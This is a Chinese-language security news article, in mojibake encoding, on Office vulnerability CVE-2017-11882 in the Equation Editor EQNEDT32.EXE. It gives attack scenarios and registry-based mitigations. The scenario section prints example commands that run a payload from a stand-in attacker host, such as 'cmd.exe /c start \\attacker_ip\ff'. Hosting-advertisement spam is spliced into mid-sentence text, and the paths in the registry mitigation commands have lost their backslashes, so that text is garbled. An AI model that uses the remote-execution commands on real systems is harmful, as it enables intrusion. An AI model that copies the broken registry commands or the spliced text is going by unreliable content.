當(dāng)人們?nèi)栽谥碧幚?ldquo;沒有補(bǔ)丁”的微軟MS Office內(nèi)置DDE功能威脅時(shí)，有研究人員又發(fā)現(xiàn)了Office的另一個(gè)嚴(yán)重漏洞，攻擊者可以利用該漏洞，香港網(wǎng)存空間 北京主機(jī)，無需受害者用戶交互，遠(yuǎn)程向目標(biāo)系統(tǒng)植入惡意軟件。該漏洞屬于內(nèi)存破壞型漏洞，可影響微軟過去17年發(fā)布的所有MS Office版本軟件，包括最新的Office 365，漏洞利用能成功在包括Windows 10在內(nèi)的所有微軟Windows操作系統(tǒng)中實(shí)現(xiàn)。

漏洞信息

該漏洞由Embedi公司研究員發(fā)現(xiàn)，漏洞可導(dǎo)致遠(yuǎn)程代碼執(zhí)行、未授權(quán)認(rèn)證繞過、無需用戶交互的遠(yuǎn)程惡意程序植入。目前漏洞編號CVE-2017-11882，主要漏洞部件為Office中的自帶公式編輯器EQNEDT32.EXE。

由于不正確的內(nèi)存操作，組件EQNEDT32.EXE會無法正確處理內(nèi)存中的執(zhí)行對象，這種破壞條件，致使攻擊者可在當(dāng)前系統(tǒng)登錄用戶環(huán)境下，利用Office遠(yuǎn)程植入惡意代碼或其它惡意程序。

微軟在Microsoft Office 2000中就引入了EQNEDT32.EXE組件，并保留至Microsoft Office 2007之后發(fā)布的所有Office 版本中，以確保新舊軟件的文檔兼容。

該漏洞的成功利用需要受害者用Office打開攻擊者特制的惡意文檔，如果與微軟的內(nèi)核提權(quán)漏洞（如CVE-2017-11847）組合利用，攻擊者將會獲得受害者目標(biāo)系統(tǒng)的完全控制權(quán)。以下視頻是在Windows 7,8,10系統(tǒng)中該漏洞的成功實(shí)現(xiàn)過程演示：

漏洞技術(shù)分析

可能的攻擊場景

Embedi研究者列舉了以下幾種該漏洞的可攻擊利用場景：

當(dāng)插入一些OLE（對象鏈接嵌入）實(shí)體時(shí)，可能會觸發(fā)該漏洞，實(shí)現(xiàn)一些惡意命令的執(zhí)行，如向某個(gè)攻擊者架設(shè)網(wǎng)站下載執(zhí)行惡意程序等。

最直接有效的漏洞利用方式就是，訪問攻擊者架設(shè)或控制的WebDAV服務(wù)器，深圳論壇空間 香港主機(jī)，并執(zhí)行其中的運(yùn)行程序。

不過，攻擊者還能利用該漏洞執(zhí)行cmd.exe /c start \attacker_ipf類似惡意命令，配合入侵或啟動WebClient服務(wù)。

另外，攻擊者還能使用諸如\attacker_ipf
.exe的命令向受害者系統(tǒng)中執(zhí)行惡意程序，惡意程序的啟動機(jī)制與\live.sysinternals.com ools service方式類似。

緩解和修復(fù)措施

在11月的補(bǔ)丁修復(fù)周期中，微軟針對該漏洞修改了EQNEDT32.EXE組件的內(nèi)存處理機(jī)制，并發(fā)布了多個(gè)漏洞補(bǔ)丁更新，強(qiáng)烈建議用戶及時(shí)進(jìn)行下載更新。

鑒于EQNEDT32.EXE組件的不確定隱患，我們建議用戶通過以下注冊表命令來對其進(jìn)行禁用：

reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0×400

如果在64位操作系統(tǒng)中安裝了32位的MS Office軟件，命令如下：

reg add “HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0×400